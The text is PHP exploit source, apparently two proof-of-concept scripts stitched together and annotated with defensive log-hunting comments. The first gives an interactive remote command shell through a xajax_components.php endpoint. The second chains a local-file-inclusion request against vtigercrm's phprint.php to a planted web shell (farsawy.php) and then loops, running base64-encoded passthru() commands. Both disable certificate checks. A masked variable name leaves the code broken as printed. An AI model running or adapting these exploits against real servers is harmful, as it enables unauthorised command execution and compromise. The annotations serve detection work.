// Interactive proof-of-concept client. It forwards every line typed by the operator to
// one fixed endpoint on the target and prints whatever the server answers.
// The start of the script (opening tag, upper banner lines) is outside this excerpt.
//
// Defensive reading: on the server side this traffic shows up as repeated POSTs to
// /plib/xajax_components.php with varname=system in the query string. The typed command
// travels in the POST body (field "fid-system"), so access logs that record only the
// request line will show the endpoint but not the command.
// NOTE(review): the excerpt names neither the affected product nor a fixed version; treat
// any reachable copy of this endpoint as suspect until that is confirmed.
echo "| n0p1337@gmail.com |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target [https://ip] # ";
// Base URL typed by the operator; concatenated into the request URL below without validation.
$target = trim(fgets(STDIN));

/**
 * Send a single HTTP request with cURL and return the response body.
 *
 * @param string $url  Full URL to request.
 * @param string $post Value handed to CURLOPT_POSTFIELDS (setting it makes cURL issue a POST).
 * @return string|bool Response body, or false when curl_exec() fails.
 */
function faget($url, $post) {
    $curl = curl_init();
    // Return the body as a string instead of printing it.
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
    // Both cookie options point at '/', the filesystem root, rather than at a file;
    // presumably this only switches cURL's cookie handling on — TODO confirm.
    curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
    curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
    // Certificate and host-name verification are both switched off, so the client
    // accepts any certificate the target presents (self-signed included).
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    // Redirects are not followed; each request gives up after 20 seconds.
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($curl, CURLOPT_TIMEOUT, 20);
    // Response headers are left out of the returned string.
    curl_setopt($curl, CURLOPT_HEADER, false);
    $exec = curl_exec($curl);
    curl_close($curl);
    return $exec;
}

// Prompt loop: runs until the operator types "exit".
while (1) {
    // The prompt shows the target with its "https://" prefix removed.
    echo "\ni-Hmx@" . str_replace("https://", "", $target) . "# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd == "exit") {
        exit;
    }
    // The typed line becomes the value of the "fid-system" field. Presumably the endpoint
    // ends up calling the function named in "varname" on that value; the server-side code
    // is not part of this page, so that is an inference.
    $f_rez = faget($target . "/plib/xajax_components.php?varname=system", "fid-system={$cmd}");
    // The raw response is printed without any filtering.
    echo $f_rez;
}
# NP : Just cleaning my pc from an old old trash , The best is yet to come ;)
// Closing statement of a helper whose beginning lies outside this excerpt. It is presumably
// the kastr() used further down to cut the text between two markers — confirm against the
// full listing.
return substr($string, $ini, $len); }

// Second half of a proof-of-concept aimed at paths under /vtigercrm/. faget() and $target
// are set up in a part of the listing that is not visible here.
//
// Defensive reading — artefacts worth searching for in access logs and on disk:
//   * requests to /vtigercrm/phprint.php whose lang_crm parameter contains "../" and "%00";
//   * requests to /vtigercrm/farsawy.php (the printed hint further down also names fa.php);
//   * POST bodies carrying "pwd" together with a base64 value in "fa";
//   * unexpected files below cache/import/, the directory the lang_crm value points into.

// lang_crm climbs two directories up and names cache/import/IMPORT_ followed by an encoded
// NUL byte, i.e. a local-file-inclusion request. The response in $me is never read.
// presumably an earlier step, outside this excerpt, placed that import file — verify.
$me = faget($target . "/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00", "");

echo "| Testing total payload\n";
// Check that farsawy.php answers with the expected marker text; stop otherwise.
$total = faget($target . "/vtigercrm/farsawy.php", "pwd=1337");
if (!eregi("Faris on the mic :D", $total)) {
    die("[+] Exploitation Failed\n");
}

echo "| Sending CMD test package\n";
// The base64 value decodes to passthru('echo farsawy'); — a self-test that only echoes
// a marker string back.
$cmd = faget($target . "/vtigercrm/farsawy.php", "pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
if (!eregi("farsawy", $cmd)) {
    // NOTE(review): this hint names fa.php, while every request in this excerpt goes to farsawy.php.
    echo " + Cmd couldn't executed but we can evaluate php code\n + use :\r\n{$target}//vtigercrm/fa.php\n Post : fa=base64code\n";
}

echo "| sec4ever shell online ;)\n\n";
// Host part shown in the prompt.
$host = str_replace('https://', '', $target);

// Prompt loop: runs until the operator types "exit".
while (1) {
    echo "i-Hmx@{$host}# ";
    $c = trim(fgets(STDIN));
    if ($c == 'exit') {
        die("[+] Terminating\n");
    }
    // Each typed line is wrapped in a passthru() call and base64-encoded before it is posted
    // in the "fa" field.
    $payload = base64_encode("passthru('{$c}');");
    // NOTE(review): the variable name on the next two lines appears masked by the hosting
    // page; it is reproduced exactly as printed.
    $f**k = faget($target . "/vtigercrm/farsawy.php", "pwd=1337&fa={$payload}");
    // Only the text between the two dash markers of the response is shown.
    $done = kastr($f**k, "-----------------", "-----------------");
    echo "{$done}\n";
}
/* I dont even remember when i exploited this shit! maybe on 2013?! whatever , Hope its not sold as 0day in the near future xDD */